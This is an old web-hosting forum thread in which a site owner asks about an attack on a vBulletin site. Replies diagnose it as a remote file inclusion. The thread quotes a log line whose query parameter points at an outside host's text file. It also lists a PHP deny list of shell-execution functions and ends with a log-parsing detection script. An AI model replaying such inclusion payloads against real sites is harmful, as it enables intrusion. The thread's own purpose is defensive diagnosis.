check log i what is that hacking method

Discussion in 'General Discussion' started by kuwaitnt, Nov 25, 2006.

  1. kuwaitnt

    Hello,

    I have a strange hack on my box.

    http://3zz.cc/iplog2.txt

    That is the log from my web site.

    It is on a shared server with CentOS 4.4.
    I am running the latest version of vBulletin.

    The server is well secured, but I don't know what this hacking method is.

    Can anyone help us prevent it?


    I know the hacker gets a help.txt file from his web site,

    but I don't know where he puts that file. I have checked my web site and there are no suspicious files. I checked the log, and I also don't know the name he requests to hack my web site.

    I think he can delete, read and change files and folders for my web site, and I think he can also control my website from another web site on that server.



    Notice:

    I am using PHP 4.4.4 with safe_mode and these disable_functions:

    phpinfo, mkdir, unlink, symlink, ini_restore, popen, pclose, system, exec, shell_exec, suExec, dl, passthru, pclose, proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, leak, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_uname, posix_getpwuid, escapeshellcmd, escapeshellarg, fpassthru, psockopen, cmd, backtick, virtual, pcntl_exec , ini_alter, parse_ini_file, show_source, apache_child_terminate, apache_get_modules , apache_get_version , apache_note, openlog, popens, filegetcontents, get_dir, dos_conv, myshellexec, get_current_user, php_uname, fileperms, filegroup, fileowner, getmyuid, getmygid

    I have set allow_url_fopen to off,

    and PHP runs with phpsuexec.


    I have installed mod_security with accunett rules or other rules I have added.

    I have installed R-fx Networks LES.

    My system is CentOS 4.4 with the current version of cPanel.



    I know the person who is trying to hack me, and I know he gets files onto my website or another web site on my server and then tries hacking.
     
  2. ramprage

    Looks like a common attack on register_globals using a remote include.
    Check your web.php file at the includet variable. It's probably not properly coded.

    Sat Nov 25 16:21:16 2006 1 91.140.140.49 6038 /home/nokia3/pub62.150.187.89 - - [20/Nov/2006:15:55:14 +0300] "GET /web.php?inludet=http://www.arabdesing.com/help.txt? HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
     
  3. kuwaitnt

    root@dnsbox [/tmp]# php -i | grep global
    register_globals => Off => Off



    It is off on that server,

    but I don't understand what this is:


    /home/nokia3/public_html/includes/init.php a _ i r nokia3 ftp 1 * c


    I think there is something about chown or chmod of files, or some FTP issue?


    I really don't know what he is trying to do :(

    The server is really well secured, but I don't understand what he is doing.
     
  4. kuwaitnt

    Hello,

    For the record: I have set register_globals off and allow_url_fopen to off.

    When checking the domlog files, I noticed

    he has uploaded files via the web in the past; he uploaded an encoded file in the cgi-bin folder.

    I need to know what his method is to hack my web sites, so that I can prevent it.

    I think I will make mod_security rules for that request: a _ i r nokia3 ftp 1 * c

    But what about the user name too, how can I make it?
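
Added example, not part of any post above: the trailing fields `a _ i r nokia3 ftp 1 * c` quoted in the thread match the layout of an FTP xferlog entry (transfer type, special-action flag, direction, access mode, username, service, authentication method, authenticated user ID, completion status), where `i` marks an incoming upload and `r` a real (non-anonymous) account. This Python example lists script uploads recorded in an xferlog and requests whose query parameter carries a remote URL, as in the `web.php` entry. The sample lines are constructed, with placeholder addresses, the placeholder host `example.test` and the assumed account name `user1`.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed samples modelled on the log lines quoted in the thread.
XFERLOG = [
    "Sat Nov 25 16:21:16 2006 1 192.0.2.10 6038 /home/user1/public_html/includes/init.php a _ i r user1 ftp 1 * c",
    "Sat Nov 25 16:25:02 2006 3 192.0.2.11 20480 /home/user1/public_html/logo.gif b _ o r user1 ftp 1 * c",
]
ACCESS_LOG = [
    '198.51.100.7 - - [20/Nov/2006:15:55:14 +0300] "GET /web.php?inludet=http://example.test/help.txt? HTTP/1.1" 403 - "-" "Mozilla/4.0"',
    '198.51.100.8 - - [20/Nov/2006:15:56:01 +0300] "GET /index.php?page=news HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
]
TAIL = ("transfer_type", "special", "direction", "access_mode", "username",
        "service", "auth_method", "auth_user", "status")

def parse_xferlog(line):
    """Split one xferlog entry; the filename sits between the fixed head and tail."""
    head = line.split(None, 8)      # 5 date tokens, transfer time, host, size, remainder
    rest = head[8].rsplit(None, 9)  # filename, then the 9 fixed trailing fields
    entry = dict(zip(TAIL, rest[1:]))
    entry.update(when=" ".join(head[:5]), host=head[6], size=int(head[7]), filename=rest[0])
    return entry

def script_uploads(lines, exts=(".php", ".cgi", ".pl")):
    """Incoming (direction 'i') transfers of server-side scripts: who, from where, what."""
    entries = map(parse_xferlog, lines)
    return [(e["username"], e["access_mode"], e["host"], e["filename"]) for e in entries
            if e["direction"] == "i" and e["filename"].lower().endswith(exts)]

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')
REMOTE_URL = re.compile(r"(?i)^(?:https?|ftp)://")

def remote_include_attempts(lines):
    """Requests in which a query parameter's value is itself a remote URL."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                hits.append((client, name, value, int(status)))
    return hits

if __name__ == "__main__":
    for hit in script_uploads(XFERLOG) + remote_include_attempts(ACCESS_LOG):
        print(hit)
```

An upload hit with access mode `r` means the FTP server accepted that account's own credentials, so the account password and the source address are the first things to review.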
     